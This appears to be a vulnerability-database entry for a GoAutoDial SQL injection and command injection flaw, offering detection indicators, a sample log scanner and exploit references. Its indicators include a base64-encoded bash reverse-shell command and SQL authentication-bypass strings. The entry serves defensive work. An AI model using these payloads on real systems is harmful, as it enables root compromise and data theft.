CVE-2015-2843
Published: 2015-05-12
Priority P263 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 38.15% (98.4th percentile)
Multiple SQL injection vulnerabilities in GoAutoDial GoAdmin CE before 3.3-1421902800 allow remote attackers to execute arbitrary SQL commands via the (1) user_name or (2) user_pass parameter in go_login.php or the PATH_INFO to (3) go_login/validate_credentials/admin/ or (4) index.php/go_site/go_get_user_info/.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| goautodial | goadmin_ce | — | — |
| goautodial | goadmin_ce | — | — |
Detection & IOCs (extracted from sources)
url: /index.php/go_site/cpanel/|| bash -c "eval `echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvNDQ0NCAwPiYx | base64 --decode`"
- Detect SQLi authentication bypass attempts targeting the user_pass POST parameter with OR-based payloads (e.g., ' or '1'='1) sent to /index.php/go_login/validate_credentials or go_login.php
- Detect GET requests to /index.php/go_site/go_get_user_info/ containing SQL injection patterns such as single quotes or OR clauses in the PATH_INFO segment
- Detect command injection attempts in the PATH_INFO of /index.php/go_site/cpanel/ containing pipe characters (||), bash, base64, or eval keywords
- Detect file uploads to go_audiostore.php where the uploaded filename contains a double extension pattern matching *.wav.php (bypasses extension whitelist check)
- Monitor web server access logs for requests to /sounds/ directory containing files prefixed with 'go_' and ending in .php, indicating successful webshell upload
- Check for version string 1421902800 in changelog.txt to determine if the target is patched; absence of this string indicates a vulnerable version
- Command injection payload is delivered as a base64-encoded reverse bash shell; detect URL-encoded pipe sequences (%7C%7C) followed by base64 strings in requests to /index.php/go_site/cpanel/
- The vulnerable version range spans multiple build timestamps between 3.3-1406088000 and 3.3-1421902800; versions in between may also be vulnerable even if they received other updates
- The SQLi authentication bypass assumes the default 'admin' user account has not been removed from the installation
- Command injection executes with root privileges, making post-exploitation impact maximal on default GoAutoDial ISO builds
- The Metasploit module defaults to SSL (port 443); detections should also cover non-SSL HTTP (port 80) deployments
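The access-log checks in the list above, written as a small log scanner. This is an added example, not code from the advisory or from any detection product; it assumes Apache combined-style access logs, the rule names are made up, and it covers only what is visible in the request line (the user_pass POST body and the uploaded filename need request-body or WAF logging instead).

```python
import re
from urllib.parse import unquote

# (rule name, lower-cased path prefix, pattern applied to the decoded PATH_INFO tail)
# Rule names are invented for this example; prefixes and keywords come from the notes above.
SQLI = re.compile(r"'|\bor\b", re.I)
RULES = [
    ("cpanel_cmd_injection", "/index.php/go_site/cpanel/",
     re.compile(r"\|\||\b(?:bash|base64|eval)\b", re.I)),
    ("user_info_sqli", "/index.php/go_site/go_get_user_info/", SQLI),
    ("login_path_sqli", "/index.php/go_login/validate_credentials/", SQLI),
]
WEBSHELL = re.compile(r"^/sounds/go_[^/]*\.php$", re.I)
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return the set of rule names an access-log line triggers."""
    m = REQUEST.search(log_line)
    if not m:
        return set()
    # Drop the query string, then decode twice so %2527-style double encoding is seen.
    path = unquote(unquote(m.group(1).split("?", 1)[0]))
    hits = set()
    if WEBSHELL.match(path):
        hits.add("sounds_php_request")
    for name, prefix, pattern in RULES:
        if path.lower().startswith(prefix) and pattern.search(path[len(prefix):]):
            hits.add(name)
    return hits

def scan(lines):
    """Return (line_number, sorted rule names) for every line with at least one hit."""
    return [(n, sorted(h)) for n, l in enumerate(lines, 1) if (h := classify(l))]

# Constructed sample lines (documentation IP range, inert payload strings).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php/go_site/go_get_user_info/admin HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php/go_site/go_get_user_info/x%27%20or%20%271%27%3D%271 HTTP/1.1" 200 734',
    '192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php/go_site/cpanel/%7C%7C%20base64%20QUFBQQ%3D%3D HTTP/1.1" 200 0',
    '192.0.2.66 - - [01/Jan/2024:10:00:12 +0000] "GET /sounds/go_test.wav.php HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for line_no, rules in scan(SAMPLE):
        print(line_no, rules)
```

Run it over the logs of both the port 443 and the port 80 virtual hosts, since the notes above point out that non-SSL deployments exist.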
No detection rules found.
Exploit-DB
GoAutoDial CE 3.3 - Authentication Bypass / Command Injection (Metasploit)
exploitdb·2017-07-05
CVE-2015-2845 GoAutoDial CE 3.3 - Authentication Bypass / Command Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "GoAutoDial 3.3 Authentication Bypass / Command Injection",
'Description' => %q{
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. The default pre-packaged ISO builds are available from goautodial.org. Currently, the hardcoded command injection payload is an encoded
Exploit-DB
GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection
exploitdb·2015-04-21·CVSS 10.0
CVE-2015-2845 [CRITICAL] GoAutoDial CE 3.3-1406088000 - Authentication Bypass / Arbitrary File Upload / Command Injection
---
Affected software: GoAutoDial
Affected version: 3.3-1406088000 (GoAdmin) and previous releases of GoAutodial 3.3
Associated CVEs: CVE-2015-2842, CVE-2015-2843, CVE-2015-2844, CVE-2015-2845
Vendor advisory: http://goautodial.org/news/21
Abstract:
Multiple vulnerabilities exist in the GoAutodial 3.3 open source call centre software that will lead to a complete compromise of the underlying database and infrastructure.
Given that multiple product updates were released during testing that do not include any code changes related to the described vulnerabilities, any version between 3.3-1406088000 and 3.3-1421902800 might also be vulnerable.
Refer to the product changelog.txt: https://github.co
Metasploit
GoAutoDial 3.3 Authentication Bypass / Command Injection
metasploit
This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges. This module has been tested successfully on GoAutoDial version 3.3-1406088000.
No writeups or analysis indexed.
- http://goautodial.org/news/21
- http://packetstormsecurity.com/files/131543/GoAutoDial-SQL-Injection-Command-Execution-File-Upload.html
- http://www.securityfocus.com/archive/1/535319/100/1100/threaded
- http://www.securityfocus.com/bid/74281
- https://www.exploit-db.com/exploits/36807/
- https://www.exploit-db.com/exploits/42296/